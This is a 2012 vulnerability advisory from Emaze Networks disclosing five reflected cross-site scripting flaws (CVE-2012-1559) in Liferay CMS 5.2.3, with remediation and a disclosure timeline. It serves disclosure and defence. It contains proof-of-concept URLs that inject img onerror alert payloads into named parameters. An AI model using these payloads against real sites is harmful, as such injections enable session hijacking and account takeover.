Multiple Cross-Site Scripting Vulnerabilities in Liferay CMS

0 comments
Advisory Information
Title: Multiple Cross-Site Scripting Vulnerabilities in Liferay CMS Community Edition 5.2.3
Release date: 17/05/2012
Last update: 17/05/2012
Credits: Coppeto Nello, Vapore Francesco, Cersosimo Fiorenzo, Del Gobbo Primo, Imperato Pasquale (Emaze Networks S.p.A.)


Vulnerability Information
Class: Input Validation Vulnerability, Cross-site Scripting
CVE: CVE-2012-1559

Affected Software
We confirm the presence of the security vulnerabilities on the following products versions:

  • Liferay Community Edition 5.2.3


Vulnerability Details
The CMS can be exploited to cause a disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account.

1) Page: group/control_panel/manage | Parameter: _140_tabs4

https://example.com/group/control_panel/manage?p_p_id=140&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_140_struts_action=%2Fmy_pages%2Fedit_pages&_140_tabs1=public-pages&_140_tabs2=pages&_140_tabs3=children&_140_redirect=&_140_groupId=28263&_140_tabs4=5d0cc%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E6cc79885871&_140_selPlid=0
2) Page: group/control_panel/manage | Parameter: _140_groupId

https://example.com/group/control_panel/manage?p_p_id=140&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_140_struts_action=%2Fmy_pages%2Fedit_pages&_140_tabs1=public-pages&_140_privateLayout=false&_140_backURL=&_140_groupId=28263&261a4
</ScRiPt%20><img%20src%3da%20onerror%3dalert('XSS')>74c1e2fc3d9=1  
3) Page: user/username/home | Parameter: _2_redirect

https://example.com/user/username/home?p_p_id=2&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_2_struts_action=%2Fmy_account%2Fedit_pages&_2_tabs1=public-pages&_2_redirect=%2Fimage%2F6144a"><img%20src%3da%20onerror%3dalert('XSS')>17c36eda2e6&_2_groupId=28263
4) Page: user/username/home | Parameter: _88_redirect

https://example.com/user/username/home?p_p_id=88&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_88_struts_action=%2Flayout_management%2Fedit_pages&_88_tabs1=private-pages&_88_redirect=%2Fimage%2Fdfcdb"><img%20src%3da%20onerror%3dalert('XSS')>d71e7518a9b&_88_groupId=28263&_88_selPlid=29301
5) Page: user/username/home | Parameter: _2_groupId

https://example.com/user/username/home?p_p_id=2&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_2_struts_action=%2Fmy_account%2Fedit_pages&_2_tabs1=public-pages&_2_redirect=%2Fimage%2F&_2_groupId=28263&c46be</ScRiPt%20><img%20src%3da%20onerror%3dalert('XSS')>026191b6b04=1

Remediation
Upgrade to Liferay 6.

Report Timeline
  • 23/01/2012 - Initial vendor contact.
  • 25/01/2012 - Vendor replied.
  • 08/02/2012 - Emaze opened a detailed security ticket on Liferay Issues Portal.
  • 17/02/2012 - Vendor replied that issues are known, and have been fixed in product version 6.1.0.
  • 02/03/2012 - Emaze asks additional technical details and the CVE ID of the vulnerabilities.
  • 02/03/2012 - Vendor replied that have not CVE ID or other details.
  • 06/03/2012 - Emaze asks a private email address to discuss the details of the vulnerabilities.
  • 17/05/2012 - No reply. Disclosure.


Copyright
Copyright(c) Emaze Networks S.p.A. 2012, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Emaze Networks has updated ipLegion, its vulnerability assessment platform, to check for this vulnerability. Contact info@emaze.net to have more information about ipLegion.

Disclaimer
Emaze Networks S.p.A. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.